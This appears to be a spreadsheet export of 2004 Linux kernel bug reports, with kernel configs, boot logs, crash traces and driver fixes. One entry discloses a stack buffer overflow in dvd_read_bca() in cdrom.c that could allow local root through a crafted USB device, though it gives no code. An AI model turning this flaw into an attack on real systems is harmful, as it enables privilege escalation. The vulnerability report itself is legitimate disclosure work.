set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set CONFIG_AGP_AMD=y # CONFIG_AGP_AMD64 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_INTEL_MCH is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_VIA is not set # CONFIG_AGP_EFFICEON is not set # CONFIG_DRM is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set CONFIG_HANGCHECK_TIMER=y # # I2C support # CONFIG_I2C=y CONFIG_I2C_CHARDEV=y # # I2C Algorithms # # CONFIG_I2C_ALGOBIT is not set # CONFIG_I2C_ALGOPCF is not set # # I2C Hardware Bus support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set CONFIG_I2C_AMD756=y # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_ELEKTOR is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_I810 is not set # CONFIG_I2C_ISA is not set # CONFIG_I2C_NFORCE2 is not set # CONFIG_I2C_PARPORT is not set # CONFIG_I2C_PARPORT_LIGHT is not set # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_PROSAVAGE is not set # CONFIG_I2C_SAVAGE4 is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_SIS5595 is not set # CONFIG_I2C_SIS630 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_VIA is not set # CONFIG_I2C_VIAPRO is not set # CONFIG_I2C_VOODOO3 is not set # # Hardware Sensors Chip support # CONFIG_I2C_SENSOR=y # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_ASB100 is not set # CONFIG_SENSORS_DS1621 is not set # CONFIG_SENSORS_FSCHER is not set # CONFIG_SENSORS_GL518SM is not set # CONFIG_SENSORS_IT87 is not set # CONFIG_SENSORS_LM75 is not set # CONFIG_SENSORS_LM78 is not set # CONFIG_SENSORS_LM80 is not set # CONFIG_SENSORS_LM83 is not set # CONFIG_SENSORS_LM85 is not set # CONFIG_SENSORS_LM90 is not set # CONFIG_SENSORS_MAX1619 is not set # CONFIG_SENSORS_VIA686A is not set CONFIG_SENSORS_W83781D=y # CONFIG_SENSORS_W83L785TS is not set # CONFIG_SENSORS_W83627HF is not set # # Other I2C Chip support # CONFIG_SENSORS_EEPROM=y # CONFIG_SENSORS_PCF8574 is not set # CONFIG_SENSORS_PCF8591 is not set # CONFIG_SENSORS_RTC8564 is not set # CONFIG_I2C_DEBUG_CORE is not set # CONFIG_I2C_DEBUG_ALGO is not set # CONFIG_I2C_DEBUG_BUS is not set # CONFIG_I2C_DEBUG_CHIP is not set # # Misc devices # # CONFIG_IBM_ASM is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # Graphics support # # CONFIG_FB is not set # CONFIG_VIDEO_SELECT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Speakup console speech # # CONFIG_SPEAKUP is not set CONFIG_SPEAKUP_DEFAULT="none" # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_TIMER=y CONFIG_SND_PCM=y CONFIG_SND_HWDEP=y CONFIG_SND_RAWMIDI=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # ISA devices # # CONFIG_SND_AD1848 is not set # CONFIG_SND_CS4231 is not set # CONFIG_SND_CS4232 is not set # CONFIG_SND_CS4236 is not set # CONFIG_SND_ES1688 is not set # CONFIG_SND_ES18XX is not set # CONFIG_SND_GUSCLASSIC is not set # CONFIG_SND_GUSEXTREME is not set # CONFIG_SND_GUSMAX is not set # CONFIG_SND_INTERWAVE is not set # CONFIG_SND_INTERWAVE_STB is not set # CONFIG_SND_OPTI92X_AD1848 is not set # CONFIG_SND_OPTI92X_CS4231 is not set # CONFIG_SND_OPTI93X is not set # CONFIG_SND_SB8 is not set # CONFIG_SND_SB16 is not set # CONFIG_SND_SBAWE is not set # CONFIG_SND_WAVEFRONT is not set # CONFIG_SND_CMI8330 is not set # CONFIG_SND_OPL3SA2 is not set # CONFIG_SND_SGALAXY is not set # CONFIG_SND_SSCAPE is not set # # PCI devices # CONFIG_SND_AC97_CODEC=y # CONFIG_SND_ALI5451 is not set # CONFIG_SND_ATIIXP is not set # CONFIG_SND_AU8810 is not set # CONFIG_SND_AU8820 is not set # CONFIG_SND_AU8830 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_BT87X is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set CONFIG_SND_EMU10K1=y # CONFIG_SND_KORG1212 is not set # CONFIG_SND_MIXART is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_INTEL8X0M is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # # CONFIG_USB_EHCI_HCD is not set CONFIG_USB_OHCI_HCD=y # CONFIG_USB_UHCI_HCD is not set # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set CONFIG_USB_PRINTER=y CONFIG_USB_STORAGE=y # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set # CONFIG_USB_HIDDEV is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_MTOUCH is not set # CONFIG_USB_EGALAX is not set # CONFIG_USB_XPAD is not set # CONFIG_USB_ATI_REMOTE is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # CONFIG_USB_SERIAL=y # CONFIG_USB_SERIAL_DEBUG is not set # CONFIG_USB_SERIAL_CONSOLE is not set # CONFIG_USB_SERIAL_GENERIC is not set # CONFIG_USB_SERIAL_BELKIN is not set # CONFIG_USB_SERIAL_WHITEHEAT is not set # CONFIG_USB_SERIAL_DIGI_ACCELEPORT is not set # CONFIG_USB_SERIAL_EMPEG is not set # CONFIG_USB_SERIAL_FTDI_SIO is not set CONFIG_USB_SERIAL_VISOR=y # CONFIG_USB_SERIAL_IPAQ is not set # CONFIG_USB_SERIAL_IR is not set # CONFIG_USB_SERIAL_EDGEPORT is not set # CONFIG_USB_SERIAL_EDGEPORT_TI is not set # CONFIG_USB_SERIAL_KEYSPAN_PDA is not set # CONFIG_USB_SERIAL_KEYSPAN is not set # CONFIG_USB_SERIAL_KLSI is not set # CONFIG_USB_SERIAL_KOBIL_SCT is not set # CONFIG_USB_SERIAL_MCT_U232 is not set # CONFIG_USB_SERIAL_PL2303 is not set # CONFIG_USB_SERIAL_SAFE is not set # CONFIG_USB_SERIAL_CYBERJACK is not set # CONFIG_USB_SERIAL_XIRCOM is not set # CONFIG_USB_SERIAL_OMNINET is not set # # USB Miscellaneous drivers # # CONFIG_USB_EMI62 is not set # CONFIG_USB_EMI26 is not set # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_LEGOTOWER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_LED is not set # CONFIG_USB_CYTHERM is not set # CONFIG_USB_PHIDGETSERVO is not set # CONFIG_USB_TEST is not set # # USB Gadget Support # # CONFIG_USB_GADGET is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y CONFIG_EXT2_FS_POSIX_ACL=y CONFIG_EXT2_FS_SECURITY=y CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y CONFIG_EXT3_FS_SECURITY=y CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set CONFIG_AUTOFS4_FS=y # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_SYSFS=y # CONFIG_DEVFS_FS is not set # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set CONFIG_RAMFS=y # CONFIG_SUPERMOUNT is not set # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_HFSPLUS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_SQUASHFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=y CONFIG_NFS_V3=y CONFIG_NFS_V4=y # CONFIG_NFS_DIRECTIO is not set CONFIG_NFSD=y CONFIG_NFSD_V3=y CONFIG_NFSD_V4=y CONFIG_NFSD_TCP=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=y CONFIG_SUNRPC=y CONFIG_SUNRPC_GSS=y CONFIG_RPCSEC_GSS_KRB5=y CONFIG_SMB_FS=y # CONFIG_SMB_NLS_DEFAULT is not set CONFIG_CIFS=y # CONFIG_CIFS_STATS is not set # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y # # Native Language Support # CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=y # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set # CONFIG_NLS_UTF8 is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set CONFIG_EARLY_PRINTK=y CONFIG_DEBUG_SPINLOCK_SLEEP=y # CONFIG_FRAME_POINTER is not set # CONFIG_4KSTACKS is not set # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y # CONFIG_CRYPTO_HMAC is not set # CONFIG_CRYPTO_NULL is not set # CONFIG_CRYPTO_MD4 is not set CONFIG_CRYPTO_MD5=y # CONFIG_CRYPTO_SHA1 is not set # CONFIG_CRYPTO_SHA256 is not set # CONFIG_CRYPTO_SHA512 is not set CONFIG_CRYPTO_DES=y # CONFIG_CRYPTO_BLOWFISH is not set # CONFIG_CRYPTO_TWOFISH is not set # CONFIG_CRYPTO_SERPENT is not set # CONFIG_CRYPTO_AES is not set # CONFIG_CRYPTO_CAST5 is not set # CONFIG_CRYPTO_CAST6 is not set # CONFIG_CRYPTO_ARC4 is not set # CONFIG_CRYPTO_DEFLATE is not set # CONFIG_CRYPTO_MICHAEL_MIC is not set # CONFIG_CRYPTO_CRC32C is not set # CONFIG_CRYPTO_TEST is not set # # Library routines # CONFIG_CRC32=y # CONFIG_LIBCRC32C is not set CONFIG_ZLIB_INFLATE=y CONFIG_X86_BIOS_REBOOT=y CONFIG_X86_STD_RESOURCES=y CONFIG_PC=y Now run, and plug either a USB storage device, or printer, or a HID device. Turn on the computer. It will lock up at the loading of hotplug. If using a printer give twenty seconds for complete system lock-up. Press reset button, and unplug all devices, and it will load just fine. Let computer start-up, and plug printer in, and it is recognized just fine, and creates a device. Unplug, and System removes device. Plug in HID device, and no device file created. Unplug, and USB kernel doesn't recognize that it has been unplugged. Plug in Mass-storage device, and it is not recognized. Here are the kernel messages: Linux version 2.6.7-gentoo-r6 (root@rapsure) (gcc version 3.3.3 20040412 (Gentoo Linux 3.3.3-r6, ssp-3.3.2-2, pie-8.7.6)) #2 Sat Jun 26 00:29:34 MDT 2004 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000001fff0000 (usable) BIOS-e820: 000000001fff0000 - 000000001fff8000 (ACPI data) BIOS-e820: 000000001fff8000 - 0000000020000000 (ACPI NVS) BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) 511MB LOWMEM available. On node 0 totalpages: 131056 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 126960 pages, LIFO batch:16 HighMem zone: 0 pages, LIFO batch:1 DMI 2.3 present. ACPI disabled because your bios is from 00 and too old You can enable it with acpi=force Built 1 zonelists Kernel command line: root=/dev/hda3 Initializing CPU#0 PID hash table entries: 2048 (order 11: 16384 bytes) Detected 805.845 MHz processor. Using tsc for high-res timesource Console: colour VGA+ 80x25 Memory: 514728k/524224k available (3105k kernel code, 8732k reserved, 1059k data, 152k init, 0k highmem) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay loop... 1589.24 BogoMIPS Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) CPU: After generic identify, caps: 0183f9ff c1c7f9ff 00000000 00000000 CPU: After vendor identify, caps: 0183f9ff c1c7f9ff 00000000 00000000 CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 256K (64 bytes/line) CPU: After all inits, caps: 0183f9ff c1c7f9ff 00000000 00000020 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU: AMD Athlon(tm) Processor stepping 02 Enabling fast FPU save and restore... done. Checking 'hlt' instruction... OK. NET: Registered protocol family 16 PCI: PCI BIOS revision 2.10 entry at 0xfdaf1, last bus=1 PCI: Using configuration type 1 mtrr: v2.0 (20020519) ACPI: Subsystem revision 20040326 ACPI: Interpreter disabled. Linux Plug and Play Support v0.97 (c) Adam Belay SCSI subsystem initialized usbcore: registered new driver usbfs usbcore: registered new driver hub PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Using IRQ router AMD756 [1022/740b] at 0000:00:07.3 Machine check exception polling timer started. apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac) audit: initializing netlink socket (disabled) audit(1088265945.049:0): initialized Installing knfsd (copyright (C) 1996 okir@monad.swb.de). udf: registering filesystem Initializing Cryptographic API mice: PS/2 mouse device common for all mice serio: i8042 AUX port at 0x60,0x64 irq 12 input: PS/2 Logitech Mouse on isa0060/serio1 serio: i8042 KBD port at 0x60,0x64 irq 1 input: AT Translated Set 2 keyboard on isa0060/serio0 lp: driver loaded but no devices found Linux agpgart interface v0.100 (c) Dave Jones agpgart: Detected AMD Irongate chipset agpgart: Maximum main memory to use for agp memory: 439M agpgart: AGP aperture is 64M @ 0xe8000000 Hangcheck: starting hangcheck timer 0.5.0 (tick is 180 seconds, margin is 60 seconds). Serial:</t>
  </si>
  <si>
    <t>(net Tulip) new PCI ID</t>
  </si>
  <si>
    <t>2004-06-26 22:48 UTC</t>
  </si>
  <si>
    <t>LM</t>
  </si>
  <si>
    <t>2005-08-31 02:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10.0 Hardware Environment: x86 Software Environment: kernel 2.6.7, ide Problem Description: the tulip driver for network cards does not work with the Microsoft MN-130 PCI Ethernet Adapter even though it should. This occurs because MS changed the PCI id (apparently from reading mailing lists). Anyway, all that is needed is for the line " {0x1414, 0x0002, PCI_ANY_ID, PCI_ANY_ID, 0, 0, COMET}, " to be adder after line 201 in tulip_core.c - i didn't make this up but the fix has been around for a long time and maybe nobody bothered to submit it since it's still broken. There are no apparent side effects except for the microsoft hardware working in linux...;) Steps to reproduce: Try and use the unmodified driver with this card.</t>
  </si>
  <si>
    <t>imposible to compile joydump</t>
  </si>
  <si>
    <t>2004-06-27 01:08 UTC</t>
  </si>
  <si>
    <t>2004-06-27 01:27 UTC</t>
  </si>
  <si>
    <t>hello, in Konfig it is INPUT_JOYDUMP but in makefile it is : CONFIG_JOYSTICK_JOYDUMP so unless you change one of them (i remplace CONFIG_JOYSTICK_JOYDUMP by CONFIG_INPUT_JOYDUMP in the makefile), the module joydump can't be compiled. thanks Matthieu</t>
  </si>
  <si>
    <t>how to make ns558 oops</t>
  </si>
  <si>
    <t>2004-06-27 01:33 UTC</t>
  </si>
  <si>
    <t>2005-12-20 14:33 UTC</t>
  </si>
  <si>
    <t>hello, here the way to make ns558 oops : have snd-intel8x0 loaded whith joystick enable. load ns558, there is a error message : "pnp: Unable to assign resources to device 00:17. ns558: probe of 00:17 failed with error -16" if you try to reload ns558, you have a error -17. then if you unload snd-intel8x0, and you try to load ns558, you have a oops (see atachement). matthieu CASTET</t>
  </si>
  <si>
    <t>possible buffer overflow in DVD handling</t>
  </si>
  <si>
    <t>2004-06-27 12:25 UTC</t>
  </si>
  <si>
    <t>2010-10-24 12:21 UTC</t>
  </si>
  <si>
    <t>Distribution: none Hardware Environment: none Software Environment: none Problem Description: reading through drivers/cdrom/cdrom.c:dvd_read_bca() shows a potential bufferoverflow. buf[4+188] is allocated on the stack, however cgc.cmd[9] and cgc.buflen are set to 255. This can be exploited by a custom made USB Storage device and used for local privilege escalation. (aka plug-in this usb device to get root). Steps to reproduce: review the function for buffer overflow again.</t>
  </si>
  <si>
    <t>Ranko Zivojnovic</t>
  </si>
  <si>
    <t>rpc.mountd triggers a kernel bug, and dies</t>
  </si>
  <si>
    <t>vanila 2.6.7</t>
  </si>
  <si>
    <t>2004-06-28 07:36 UTC</t>
  </si>
  <si>
    <t>Mark Hannessen</t>
  </si>
  <si>
    <t>2005-08-07 13:35 UTC</t>
  </si>
  <si>
    <t>Distribution: LFS latest Hardware Environment: AMD XP 2200 Mhz Problem Description: rpc.mountd triggers a kernel bug, and dies Steps to reproduce: I don't know how to reproduce it, but it is repeating itself over and over again. My server won't run longer then 2 hours before rpc.mountd dies. (under load) Kernel dump: kernel BUG at include/linux/dcache.h:276! invalid operand: 0000 [#1] PREEMPT Modules linked in: CPU: 0 EIP 0060:[&lt;c0163b89&gt;] Not tainted EFLAGS: 00010246 (2.6.7-server) EIP is at path_loopup+00x89/0x140 eax: 00000000 ebx: 00000042 ecx: 00000000 edx: d91e2f58 esi: d8653f70 edi: dcf20000 ebp: 00000006 esp: d8653f10 ds: 007b es: 007b ss: 0068 Process rpc.mountd (pid: 514, threadinfo=d8652000 task=d89871d0 Stack: 00000000 dd699c08 00000042 00000043 d8653f70 c0164323 dd699c08 00000001 00000001 000000d0 dffc5058 dffccc7c 00000000 dffeea68 c0140df6 00000042 bffff0b0 dcf20000 d8652000 c015482e dcf20000 00000043 0000001b d8653f70 Call Trace: [&lt;c0164323&gt;] open_namei+0x400 [&lt;c0140df6&gt;] cache_alloc_refill+0x156/0x220 [&lt;c015482e&gt;] flip_open+0xc3/0x400 [&lt;c0154ceb&gt;] sys_open+0x5b/0x90 [&lt;c010609b&gt;] syscall_call+0x7/0xb Code: 0f 0b 14 01 ba 28 4e c0 eb ba 8b 02 8b 80 00 05 00 00 8b 48 &lt;6&gt; note: rpc.mountd[514] exited with preempt_count 1 bad: scheduling while atomic! [&lt;c04b4e35&gt;] schedule+0x475/0x480 [&lt;c0145fcb&gt;] unmap_page_range+0x4b/0x80 [&lt;c01461ac&gt;] exit_mmap+0x83/0x160 [&lt;c014a263&gt;] mmput+0x64/0x90 [&lt;c001fa42&gt;] do_exit+0x152/0x400 [&lt;c0107480&gt;] do_invalid_op+0x0/0xd0 [&lt;c0107198&gt;] die+0xf8/0x100 [&lt;c0107549&gt;] do_invalid_op+0xc9/0xd0 [&lt;c0163b89&gt;] path_lookup+0x89/0x140 [&lt;c01213bd&gt;] __do_softirq+0x7d/0x80 [&lt;c013c655&gt;] buffered_rmquee+0xf5/0x1c0 [&lt;c0106aa5&gt;] error_code+0x2d/0x38 [&lt;c0163b89&gt;] path_lookup+0x89/0x140 [&lt;c0164323&gt;] open_namei+0xc3/0x400 [&lt;c0140df6&gt;] cache_alloc_refill+0x156/0x220 [&lt;c015482e&gt;] filp_open+0x3e/0x70 [&lt;c0154ceb&gt;] sys_open+0x3e/0x70 [&lt;c010609b&gt;] syscall_call+0x7/0xb My Config file: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y CONFIG_BROKEN_ON_SMP=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y # CONFIG_AUDIT is not set CONFIG_LOG_BUF_SHIFT=14 CONFIG_HOTPLUG=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUMM is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set CONFIG_X86_GENERIC=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y # CONFIG_SMP is not set CONFIG_PREEMPT=y CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set # # Firmware Drivers # # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # CONFIG_EFI is not set CONFIG_HAVE_DEC_LOCK=y # CONFIG_REGPARM is not set # # Power management options (ACPI, APM) # CONFIG_PM=y CONFIG_SOFTWARE_SUSPEND=y CONFIG_PM_DISK=y CONFIG_PM_DISK_PARTITION="/dev/discs/disc0/part2" # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI=y CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_X86_PM_TIMER is not set # # APM (Advanced Power Management) BIOS Support # CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set CONFIG_APM_DO_ENABLE=y # CONFIG_APM_CPU_IDLE is not set # CONFIG_APM_DISPLAY_BLANK is not set CONFIG_APM_RTC_IS_GMT=y # CONFIG_APM_ALLOW_INTS is not set CONFIG_APM_REAL_MODE_POWER_OFF=y # # CPU Frequency scaling # # 